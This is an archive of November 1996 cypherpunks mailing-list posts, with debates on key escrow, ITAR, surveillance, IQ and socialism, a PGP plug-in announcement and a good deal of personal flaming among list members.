ACysH1K98UXlGfet9zjn/XN4RMnGq64EHXvJu56H7OHhwhoerTpVIW5MUYt+QExk
KKnRNrdq8WVGoaMywSM4qKbaJr8aNMBWkldUKR4NElvAjIEEO9z0msNPp33RAAUR
tClCZW5qYW1pbiBHcm9zbWFuIDxiZ3Jvc21hbkBoZWFsZXkuY29tLmF1PokAlQMF
EDKNX9vc9JrDT6d90QEBxVYEAL5nw1NiyaPpG8R2x7lNcqOcavj/cCmDYT8swT02
Z0AO0C7PGpgp9V38Yyki0FB3yaiJhIQ3Kw6xCtuI8f1F4Vfql/nZebzQERl8kTa4
sI/4xSKRT/Riw/wSGupagU1F1wYIPlXOCdUilIfLzVf4IOsxKjJMdm7aKladSxkV
N7Yg
=Yapx
-----END PGP PUBLIC KEY BLOCK-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Thu, 28 Nov 1996 07:44:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Eudora/PGP Plug-in--Free
Message-ID: <199611281544.HAA12685@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


                             Eudora/PGP Plug-In

Download version 0.20 from the Web:
   * http://www.prism.gatech.edu/~gt6525c/eppi/epp16_02.zip
     (for 16-bit version of Eudora 3.0 for Windows 3.1)
   * http://www.prism.gatech.edu/~gt6525c/eppi/epp32_02.zip
     (for 32-bit version of Eudora 3.0 for Windows NT/95)

If you don't have Web access, but have FTP access, try the following sites.
Note that if the version you are trying to get was released today or just a few days ago, it may not have shown up at the sites below yet, so give it a few days:

papa.indstate.edu: /pub/winsock-l/mail/epp16_02.zip
                   /pub/winsock-l/Windows95/mail/epp32_02.zip
                   /pub/winsock-l/WindowsNT/mail/epp32_02.zip

ftp.winsite.com:   /pub/pc/win3/winsock/epp16_02.zip
                   /pub/pc/win95/winsock/epp32_02.zip

If you want to be automatically notified of new versions, send e-mail to gt6525c@prism.gatech.edu with the subject of "eppi news", and the following message body:

join
stop




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Barnes <robertb@tritro.com.au>
Date: Wed, 27 Nov 1996 14:38:41 -0800 (PST)
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: List membership
Message-ID: <c=AU%a=_%p=Tritronics_.Aust%l=TRI_NT5-961127223754Z-327@net.tritro.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Is cypherpunks subscribed to some CNET new service list by design or
accident?

I looks like SPAM to me.

</enter confession mode>

I must admit that in my frenzy to unsubscribe I attempted to unsubscribe
cypherpunks.

</exit confession mode>

RAB

--------------------------------------------------------------
Robert Barnes                     Phone: +61 7 32529722
Engineering Manager               Fax:   +61 7 32571403
Tritronics (Australia) Pty Ltd    Email: robertb@tritro.com.au

PGP Key fingerprint
  =  02 A6 22 5E 26 D3 7C 4D  E2 91 9E 15 AC EA B1 58
Send e-mail with "get key" in the "Subject:" field to get
a copy of my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 09:35:06 -0800 (PST)
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Hurray! A good example of rational thinking ...
In-Reply-To: <199611280144.RAA19906@server1.chromatic.com>
Message-ID: <329DC21B.4361@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua wrote:
> > > It is truly counter-productive to insist on conspiracy theories and
> > > anti-government rhetoric.  Sure, there have been conspiracies in the
> > > past.  Sure, there have been more than our fair share of atrocities.

[mucho snippo]

The danger in conspiracy theories (and you can check the L.A. Times for
verification of this) is that they are often tied in to anti-Semitism
and other forms of racism, and/or provide an excuse to....

The fact is, though, that only government possesses the power to ruin the
lives of masses of people, which they have often done, even in this century.
Anyone who says "the conspiracies aren't true" and "anti-government rhetoric
is automatically bad", etc. is just sticking their head in the sand.

The militias are a necessary correction to government excess, however
negative the implications of militia power might be.

As far as the difficulty in creating the infrastructure to monitor every-
one, well, it exists and is growing by the minute.  All "they" have to do
is listen in, and have smart programs to sort out what they want to look
at (which they certainly do).  Think of it as a percentage deal.  The
people the govt. most want to monitor are the ones who are the most
active in their travel and communication, therefore, it greatly reduces
the monitoring load.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Thu, 28 Nov 1996 06:06:12 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: COMPUTER THEFT, LOW-TECH STYLE
In-Reply-To: <v0300781baeb8fbd27f65@[206.119.69.46]>
Message-ID: <199611281359.IAA03684@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Robert" == Robert Hettinga <rah@shipwright.com> writes:

Robert> COMPUTER THEFT, LOW-TECH STYLE

Robert> A thief broke into a Visa International data processing center
Robert> in California a couple of weeks ago and stole a personal
Robert> computer containing information on about 314,000 credit card
Robert> accounts, including Visa, MasterCard, American Express,
Robert> Discover and Diners Club, says a Visa spokesman.

Not a big surprise. As we build increasingly secure systems, we shift
the weakest point of the entire system into the realm of physical
access. Honestly, I'm surprised that we don't see this  sort of thing
more often. (Or maybe they're just going undetected.) After all, it is
the weakest point at which a system will be attacked.

Robert> Authorities speculate that the perpetrator was stolen for the
Robert> resale value of the hardware, rather than the information it
Robert> contained.

Uh-huh. Wouldn't want to cause any kind of a panic among the masses,
would we? Noooo, not when the perception of our super-secure credit
card networks and other financial information infrastructure is at
stake. (And Watergate was a simple bungled burglary, right?)

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 09:35:13 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: IQ and age
In-Reply-To: <199611280447.WAA23636@algebra>
Message-ID: <329DC5A0.6228@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Dale Thorn wrote:
> > The biggest influence on IQ are the so-called "engrams" (fears, super-
> > stitions, anxieties, etc.) planted in your brain early in life.
> > Some of this can be overcome with mental exercise, and awareness of what
> > negative influences are holding you back.  Much easier said than done!
> > IQ as they attempt to measure it can probably be most easily explained
> > as pattern matching skills. Unfortunately for testing, and although you
> > can be every bit as intelligent at 70 as at 10, your pattern-matching
> > skills change and evolve over time, so any given tests will only apply
> > (more or less) at the age group they are optimized for.

> Would you dismiss strong correlations between IQ and success in life
> and academia as something irrelevant?

Not at all, and I think you could make some interesting equations out of
this if you wanted to spend the time.

Factors for raw intelligence, i.e., pattern matching skills.
Factors for aggressiveness, assertiveness, self-confidence, etc.
Factors for manipulative ability (to manipulate people, etc.).  I don't
know how to properly categorize this last item, but perhaps a professional
psychologist would.

In sum, I think you could observe successful people and establish most
of the relevant factors, but be aware - if you are not an insider in
several of these "success circles", you might miss one or more key
factors, particularly those that would be denied by successful people,
such as willingness to do things people don't like to talk about openly.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 28 Nov 1996 06:13:15 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Israel crypto restrictions
In-Reply-To: <R053XD11w165w@bwalk.dm.com>
Message-ID: <199611281409.JAA21283@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
| Adam Shostack <adam@homeport.org> writes:
| > 	They're listed on NASDAQ (CKP).  This makes them an American
| > company for purposes of export controls.  (This from an employee of
| > Checkpoint who I asked that exact question.)
| 
| This is truly bizarre. First, if they were on the NASDAQ, they'd have a
| 4-letter ticker symbol, not a 3-letter symbol. MSFT (Microsoft) is on NASDAQ.
| IBM (IBM) and F (Ford) are on the New York stock exchange and/or
| American stock exchange.

	Oops.  Misread my stock service.  I usually pay little
attention to what exchange something is traded on.  CKP is on the
NYSE.

| Sometimes the stock of a foreign company is traded in the U.S. in the form
| of American Depository Receipts (ADRs) not sponsored by the company. How
| could that impose any obligation on it?

	"He asks, as if the ITARs were logical."

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 28 Nov 1996 09:35:19 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: TV/Radio: Crypto Policy on NPR
In-Reply-To: <3i63XD12w165w@bwalk.dm.com>
Message-ID: <329DC778.71AB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> Ernest Hua <hua@chromatic.com> writes:
> > McNeil & Lehear (sp?)  (ok, I know, one of them is gone, but I forgot
> > which) News Hour had a segment on crypto policy.  Generally a balanced
> > non-technical report, except that there is no mention of the free
> > speech issue.

> Do you think they should have mentioned that cypherpunks are against free
> speech and that John Gilmore (spit) is a liar and a content-based censor?
> Gilmore is irrelevant and not worth mentioning.

BTW, there's an excellent picture in the Public Domain showing Robert
McNeil (sp?) looking over the fence on the grassy knoll, seconds after
they blew off the president's head.  I guess ol' Bob musta been one of
those "extremely few, ignorant, stupid people" who thought shots may
have come from somewhere besides the depository (per O.C. Register).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Thu, 28 Nov 1996 09:10:01 -0800 (PST)
To: ben@algroup.co.uk
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
Message-ID: <3.0.32.19961128085237.0069afc0@best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:12 AM 11/27/96 +0000, you wrote:
.....etc
Can you be more specific?
What are the vulnerabilities you are aware of?

>I've never seen a security review of SSLeay, and if anyone gave it a clean
bill
>of health, they didn't have their eye on the ball. Note, I'm not knocking
>SSLeay here, it is a wonderful lump of code, but it hasn't been written with
>security in mind (IMHO).
>
>Cheers,
>
>Ben.
>
>-- 
>Ben Laurie                Phone: +44 (181) 994 6435  Email: ben@algroup.co.uk
>Freelance Consultant and  Fax:   +44 (181) 994 6472
>Technical Director        URL: http://www.algroup.co.uk/Apache-SSL
>A.L. Digital Ltd,         Apache Group member (http://www.apache.org)
>London, England.          Apache-SSL author
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: null@void.gov
Date: Thu, 28 Nov 1996 09:09:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Whitehouse Releases Blueprint...
Message-ID: <3.0.32.19961128091318.0068f958@best.com>
MIME-Version: 1.0
Content-Type: text/plain



Notably, the emphasis is on the needs of business, not "people."

We are in an excellent position to observe and document the process whereby
"business" -- that is, organizations motivated primarily, if not exclusively,
by the desire for short-term profits accruing to vested interests -- comes
to dominate and control a technology.  The auto and television industries come
to mind as two prior examples.  We are about to see the net go the same way.
Take notes.

			"I have to praise the administration and Ira for
                      reaching out to the private sector for
                      comments," Computers and Communication
                      Industry Association President Ed Black said.
                      "There's a great emphasis on the needs of
                      business here."

                      Even so, privacy activists remained
                      disappointed with many of the document's
                      features. "This isn't anything new," said David
                      Banisar, counsel to the Electronic Privacy and
                      Information Center. "The privacy stuff is
                      terrible. They say it's market driven, but
                      markets don't work with privacy. It's like what
                      happened with P-Trak."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 07:52:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <199611281111.AAA26386@mycroft.actrix.gen.nz>
Message-ID: <c6X4XD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Paul Foley <mycroft@actrix.gen.nz> writes:

> On Wed, 27 Nov 96 19:57:27 EST, Dr.Dimitri Vulis KOTM wrote:
>
>    Yes. On the Internet it may not be immediately evident that the other side
>    of the debate is represented by clueless juveniles with whom you simply
>    wouldn't talk in a physical encounter. Trying to explain the need for key
>
> Or people who act like clueless juveniles on the net, while seeming to
> be nice, rational adults in real life.  I hear you fit that
> description fairly well (I, of course, can only speak for the online side).

That's in the eye of the beholder. I certainly don't have to be polite if I
choose to address a cybergang of raving ignorant flamers who oppose free
speech and advocate content-based censorship. Is John Gilmore polite to me?

>    > I must admit that I am at a loss to understand the heat which
>    > Dorothy Denning generates on the Cypherpunks list, which seems to
>    > be second only to the heat generated by posting recipes for roast
>    > feline in rec.pets.cats.
>
>    I've seen other people abused on this mailing list - usually, whoever
>    knows more about cryptography then the regular "lynch mob".
>
> "Knows more" == "rants endlessly about how the letters "Q.E.D." and
> some nonsense about hot air balloons render a cryptosystem
> unbreakable."

You're lying. I never said anything like that. Fred Cohen never said
anything like that. Dorothy Denning (whose name the cypherpunks can't spell)
never said anything like that. On the contrary, Paul Bradley who rants about
brute force attacks on OTP, is considered top 'punks' cryptography expert.

>    I had the pleasure of meeting Dr. Denning in person and I asked her
>    about her views on GAK. Her responses made a lot of sense to me. Most
>    businesses, if they thought about it, would prohibit their employers
>    from having information on company computers encrypted so the owner
>    of the computer can't read them. This is just good business sense.
>
> Of course it is.  And they can do this, today, without any
> legislation!  I believe the commercial version of PGP (Business
> Edition?) has support for this.
>
> This is, of course, totally unrelated to GAK (unless you consider
> people to be the property of their government, I suppose).

This semester I'm teaching an undergraduate course in economics and I find it
very challenging to explain, e.g. the Laffer curve to students who have never
paid any taxes. Or, some students couldn't understand the difference between
different flat-rate pre-paid medical plans vs. pay-as-you-go medical plans.
They've never encountered anything like this in their lives and it takes weeks
for new concepts to sink in.

Indeed, I recall how a few years ago my wife was teaching a calculus course
and she told me about an inner-city student who was reasonably bright, but
had never left the inner city in her life. She had trouble with word
problems involving, e.g., mountains (popular in calculus texts :-) because
she had never seen one and couldn't quite understand what it was.

When cypherpunk juveniles rant about GAK, they are unable to present any
arguments for or against it other than personal attacks and name-calling
(like the recent pile of sexual innuendo e-mailed anonymously to Dr.Denning).
To me this shows that they're ignorant of the cryptography issues involved,
of law enforcement, of corporate data security policy, and are either too
young to know or unwilling to learn.

Why do you think I don't discuss my work on this mailing list?

>    This mailing list suffers from the presence of several mentally disturbed
>    juveniles who a) are clearly ignorant of cryptography (e.g. rant about
>    brute force attacks on OTP); b) are cognizant of their utter ignorance and
>    stupidity; c) are envious of anyone who does know what s/he's talking
>    about.
>
> d) rant endlessly about Tim May.
> e) put "(fart)" or "(spit)" after every other word.
> f) rant about John Gilmore's alleged sexual preferences.  (I seem to
>    recall something about Tsutomu Shimomura "stealing" his girlfriend??)

Huh? I met Tsutomu once, briefly. I'm sure he's capable of stealing people's
girlfriends, being rich and good-looking, but I doubt very much that John
Gilmore has one. (Not that it's relevant. Cygnus Support's hiring practices
are relevant, since they demonstrate what an asshole Gilmore is. I used to
respect Gilmore, but not anymore. He's a liar and a content-based censor.)

> g) continually bring up Paul Bradley's "brute forcing a OTP" post,
>    which was quite clearly a simple misunderstanding.
>
> [and h) probably rant about me for a while now.  Prove me wrong.]

Yeah, let's talk about Paul Bradley. (A U.K. undergraduate who probably
doesn't deserve the time we spend talking about him.) Paul flames
ceaselessly on the cypherpunks mailing list, refers to Don Wood as "Don Wood
(spit)", has sent me numerous threatening e-mails, does not understand what
either "brute force" or "OTP" is, and is unwilling to learn. Now, most
undergraduates don't know what brute force and/or OTP are, but they can
learn and they do learn if they intend to discuss the subject at such
length. Paul is a typical ignorant "cypherpunk". He likes to rant about
crypto because it's "kewl", but doesn't want to invest the time in learning
the meaning of the words he (mis)uses. "Punks" is well-chosen name.

>    So, they feel compelled to harrass anyone who's smarter / more
>    knowledgeable than they are (sometimes using the anonymous remailers) in
>
> Ah!  That explains the "Timmy (fart) May" posts!  *Now* I get it!

Tim May is a coward, afraid to sign his name on his own flames. E.g., I've
received several hate e-mails via the anonymous remailers saying stuff like
"kill all Russian immigrants". Tim May is known to hate immigrants and Jews
(advocates the destruction of Israel etc).

>    The continuing verbal abuse of Dr. Denning is no different from the abuse
>    previously heaped on Fred Cohen or David Sternlight or yours truly.
>
> The only "continuing verbal abuse" I've seen on this list is you and
> those "Freedom Knight" twits abusing Tim May and John Gilmore.

You're lying again - or you don't consider cypherpunks calling Dr. Denning
"clueless bitch" to be verbal abuse?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Thu, 28 Nov 1996 06:35:25 -0800 (PST)
To: ichudov@algebra.com (Igor Chudov)
Subject: RE: IQ and age
Message-ID: <9610288492.AA849202497@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



ichudov@algebra.com (Igor Chudov) wrote:
>Would you dismiss strong correlations between IQ and success in life 
>and academia as something irrelevant?

Remember: Correlation is not causation. In this as in many other correlations,
unreported third factors can strongly affect the outcome. 

In England, Cyril Burt devised an IQ test given to English school children at
age 11 in order to decide whether they should proceed through the trade school
system or university system. Unsurprisingly, those with higher IQs at age 11
(whatever the reason) typically received better educations and greater monetary
success in life.

In France, you may find that rich parents correlate well to "success in life and
academia" substantially because they achieve more frequent placement in
polytechnical institutions which correspond to the best universities in the U.S.
and Canada. Poorer students, independently of IQ, usually go to less capable
institutions.

In the U.S., the Graduate Management Admissions Test (GMAT) administered by ETS
is often required for people applying for post-graduate studies. The obstensible
reason is that it gives an indication of the probable ability of the applicant
to succeed in the course. By ETS's own figures, the correlation is only 30% with
successful completion of one year of studies and lower for full completion.
There are higher correlations for other factors (incoming institution, age), yet
the GMAT number is still mandatory. The draw of a single number is compelling.

Did I mention that ETS is also a monopoly.

Ciao,
James

If you can't measure it, it doesn't exist.

"What hit him?" "I don't know, I didn't see."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Thu, 28 Nov 1996 06:41:02 -0800 (PST)
To: "Lurker" <lurker@mail.tcbi.com>
Subject: Re: IQ and age
Message-ID: <1.5.4.32.19961128143859.00703224@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Have we had an influx of fuzzy-thinking liberals lately?  Not that this is a
bad thing, it is hard to argue with people who agree with you on everything :-)

At 06:49 AM 11/28/96 -0600, Lurker wrote:
>>I would.  If you look at who has the oppertunities to go college you will
>note that those who are good at taking tests (SAT, ACT, or IQ) are those
>who get to go.  You will also note that money also breeds success, or can
>someone give me an argument for the fact that there are more rich kids
>going to Harvard, Yale, Stanford, and the like than poor kids. (These
>schools almost gaurentee success.)

The ability to spell helps to gaurentee success as well.  Seriously, you
ignore the correlation between performance in college and standardized test
scores.  There is a reason these are used in admissions - they are actually
pretty good predictors of the ability to perform college level work.

>If you want to find a correlation look for it in money not tests.  And if
>you are insistant on finding it in tests, ask why the scores are as they
>are (was the test written to the advantage of one group over another or can
>one group buy the "A" with special courses which teach the skills needed to
>score high.)

Oh, I forgot.  Only certain racial/ethnic groups are capable of
understanding basic mathematical concepts.  Of course, caucasians are one of
these groups (since they consistently are outperformed by immigrants from
other countries).  

I know it makes you feel good to believe that all that is wrong is caused by
conspiracies led by the EVIL RICH in this country.  I happen to feel better
believing in the potential for any individual in this country to succeed
through hard work.

        Clay
*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 07:51:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Counterproductive Dorothy Denning Flames
In-Reply-To: <199611280555.XAA07103@mailhub.amaranth.com>
Message-ID: <BR14XD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"William H. Geiger III" <whgiii@amaranth.com> writes:
> <sigh> GAK - Government Access to Keys and corporate control of encryption pr
> keys are two completely different issues. This is just more smoke and mirrors
> confuse the issue. There are many solutions currently available for a company
> the encryption of their data including the use of "master keys" to prevent da
> option available even with PGP). Government mandated infrastructure of GAK is
> and unwarranted for such purposes.

Surely someone who can't learn to format their text to 80 columns (perhaps
because he uses a dead operating system) has no credibility when he speaks
of technical things he clearly knows nothing about.

You remind me of a student in my C++ class who just couldn't understand why a
certain C expression evaluated to what it did. We made it simpler and simpler
until we had no variables left and this expression (w/o parens) on the board:
                                   1+1*2
The student forcefully argued that it should be equal to 4.

> Cooking With Warp 4.0

Another sign of cluelessness. OS/2 is dead. I've beein using OS/2 since v 1.0,
but now I'm moving to NT 4.0. I need to find the device drivers for all my
hardware.

Choke on your turkey. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 28 Nov 1996 08:40:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Israel crypto restrictions
In-Reply-To: <199611281409.JAA21283@homeport.org>
Message-ID: <3J24XD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> Dr.Dimitri Vulis KOTM wrote:
> | Adam Shostack <adam@homeport.org> writes:
> | > 	They're listed on NASDAQ (CKP).  This makes them an American
> | > company for purposes of export controls.  (This from an employee of
> | > Checkpoint who I asked that exact question.)
> |
> | This is truly bizarre. First, if they were on the NASDAQ, they'd have a
> | 4-letter ticker symbol, not a 3-letter symbol. MSFT (Microsoft) is on NASDA
> | IBM (IBM) and F (Ford) are on the New York stock exchange and/or
> | American stock exchange.
>
> 	Oops.  Misread my stock service.  I usually pay little
> attention to what exchange something is traded on.  CKP is on the
> NYSE.

The exchange is of little relevance to most small investors. It matters, e.g.,
if you're trying to figure out your transaction costs. If you buy or sell an
exchange-listed stock, then there's the stock price (money going to the shares'
old owner or coming from the new owner) and a separate commission going to your
broker (3c/share if you're smart). With NASDAQ stocks, you buy them at ask
price and sell them at bid price. The spread between the two prices is the
broker's source of revenue. You can't tell how much of the money you paid went
for the shares and how much to the broker. For the same reason the volume
figures in most sources have to be divided by 2 for NASDAQ issues to be
comparable with exchange-listed issues.

Anyway it's irrelevant in this case.

> | Sometimes the stock of a foreign company is traded in the U.S. in the form
> | of American Depository Receipts (ADRs) not sponsored by the company. How
> | could that impose any obligation on it?
>
> 	"He asks, as if the ITARs were logical."

Fuck ITAR, fuck being (un)sponsored, consider the SEC disclosure requirements.
In the U.S., a publicly traded company has to file reports with the SEC and
make them publicly available. There's the big annual report (10K etc) at the
end of the fiscal year, and little quarterly reports (10Q etc). Other countries
have different requrements. E.g. in Japan they only have the annual report and
the semiannual (QII) one - not for QI and QIII. Sony's ADRs (SNY) are traded in
the U.S. pretty actively, but neither Sony nor any other Japanese company I
know of issues QI or QIII reports.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 28 Nov 1996 08:16:16 -0800 (PST)
To: jya@pipeline.com (John Young)
Subject: Re: TIA Invites
In-Reply-To: <1.5.4.32.19961127013503.0067151c@pop.pipeline.com>
Message-ID: <199611281613.LAA21744@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
| A rep of the Telecommunications Industry Association
| telephoned to say that TIA has invited authority to 
| investigate disclosure of TIA's TR45.3 to the unworthy.

	Did they say what they were investigating?  Usually, talking
to the unworthy is not a crime.  :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Thu, 28 Nov 1996 10:15:24 -0800 (PST)
To: varange@crl.com
Subject: Re: The Difference Between The Right And Left
In-Reply-To: <Love@22594>
Message-ID: <199611281815.LAA06924@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----------------------------------------------------------------------


In <Love@22594>, on 11/27/96 
   at 10:47 PM, varange@crl.com (Troy Varange) said:

::
::	This is, of course, confusing to y'all because your all a
::	bunch of stupid college kids.
::
        NO, NO, NO!  you have propounded an absurdity. The truth is:

        Your "bunch of stupid college kids" are the only ones who _do_
    understand.  They simply are still young enough to sincerely believe
    they have inately been blessed with all the assimilated knowledge of
    the generations!

        You must progress to an old man before you fully comprehend that
    true knowledge has eluded you in your miniscule slice of infinite 
    time and _your_ future is not truly limitless. 

        so spake Attila!

                | The pen may often be mightier than the sword,
 *<%%%%%%%%%%%%|+>-================================-------------------
                | but, the sword sure as hell is faster....


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMp3QxL04kQrCC2kFAQFMwwP5AeCDlzzEFFFUvulcjzq8qy4vkczYJ4nr
rXV8pCjyqH8ovtxqEAbH8flKggwWO3a9oxIAvSmAp35yl+C7+60CBL7BJ3yPlQFr
uuazqmotWHTjy7s6tq7ZjphMMH+PxlhbhuUp+O9pR2nw8M5REFoYiW6s/kiBIxd7
lNXLGI0lpNY=
=LtZL
-----END PGP SIGNATURE-----

  ==== begin original propounderance of all-powerful knowledge ====

::	The French Revolution perhaps provided the best
::	definition as the origional coiners of the terms.
::
::	The Left is for radical change and the Right is for
::	evolutionary change.
::
::	That would put mainstream politics decidedly on the right
::	wing side of the political spectrum.
::
::	The left wing is a rather motly collection including many
::	anarchists, communists and nazis, yet many of the same
::	types are decidedly right wing.
::
::	A historical anecdote would be the Bucharin-Rykov wing of
::	the Bolshevik party in the late twenties. They were right 
::	wing while Stalin was left wing.  Yet, Bucharin would be
::	considered quite radical for today's bean counting
::	politics.
::
::	This is, of course, confusing to y'all because your all a
::	bunch of stupid college kids.
::







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Thu, 28 Nov 1996 08:23:38 -0800 (PST)
To: "Murray Hayes" <mhayes@infomatch.com>
Subject: RE: Re: wealth and property rights
In-Reply-To: <199611281157.DAA12088@infomatch.com>
Message-ID: <199611281738.LAA11076@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199611281157.DAA12088@infomatch.com>, on 11/28/96 
   at 04:53 AM, "Murray Hayes" <mhayes@infomatch.com> said:

>On Wed, 27 Nov 96 10:16:20 -0500, William H. Geiger III wrote:

>>In <009ABBF7.ACB06A80.64@SPRUCE.HSU.EDU>, on 11/22/96 
>>   at 12:18 PM, jc105558@spruce.hsu.edu said:
>>
>>
>>socialism uses FORCE to take what it wants while the capitilism you have a
>>free & volintary exchange.
>>
>>why is this so hard to understand??
>>

>Don't be an idiot.  Socialism has nothing to do with force.  It is an
>economic system not a military stance.  

>Communisist belive:

>>From each according to there abilities
>To each according to there needs.

>Socialist belive:

>>From each according to there abilities
>To each accoring to there contirbution.

>They are very similar, BUT HAVE NOTHING TO DO WITH FORCE!!!
>Some countries have very socialized systems with democracy.  Those people
>want socalized everything.  The US is socialized to a very small degree. 
>The UK is socialized to a further degree.
 
<sigh> socialism has EVERTHING to do with force. Socialism is based on the
TAKING from one to give to another. Without FORCE or the threat of FORCE
most people will not allow their hard earned property to be taken away
from them.

You look at any socialist program in the "democracies". Every one is a)
Manditory b) Backed by FORCE.



No socialist program has ever been implemented on a large scale without
the use of FORCE. It just can't work without it. I do not wish to be part
of the socialist programs in the U.S. Medicare, Medicaide, Welfaire, SS,
WIC, FoodStamps, ...ect. It is only because of the threat of the use of
FORCE against me that I continue to pay for such programs AGAINST MY WILL.

This is the same everywhere. If these were programs that the majority were
willing to participate volentary then why are they Manditory?? Why use the
FORCE of government to implement them?? 

Because socialism is THEIFT and people naturally resist the theift of
their property.



-- 
-----------------------------------------------------------
"William H. Geiger III" <whgiii@amaranth.com>
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 28 Nov 1996 08:33:06 -0800 (PST)
To: hal@rain.org (Hal Finney)
Subject: Re: Anon
In-Reply-To: <199611210202.SAA10970@crypt.hfinney.com>
Message-ID: <199611281629.LAA21815@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	Brin's argument has two ideas that I find annoying.  One is
that the changes he forsees are inevitable, the other is that security
is not about economics.

	The idea that universal surveillance is inevitable is based on
the assumption that everyone lives in a city, and the technologies of
spying can be cheaply deployed.  A good deal of privacy can be
obtained by moving a small or large distance away.  Monitoring
technology is not cheap.  When it is cheap, the network links to
connect it all will still be expensive.  (etc.  The economics of a
surveillance state lead to something in the mix, people, cameras,
policemen to make arrests etc, being expensive.)

	The second mistake is related, and assumes that the rich can
be forced to give up the privacy that the poor have already lost.  The
expense of a defense is related to the effort involved in breaking
that defense.  If I have a mansion with grounds, I can deploy defenses
against the low cost cameras and bugs for less than my privacy is
worth to me.  I can also team up with my neighbors to have a well
defended enclave.

	So the surveillance state that Brin wants will not apply to
the rich, but only the poor.  I wonder if it will affect him.

Adam

Hal Finney wrote:
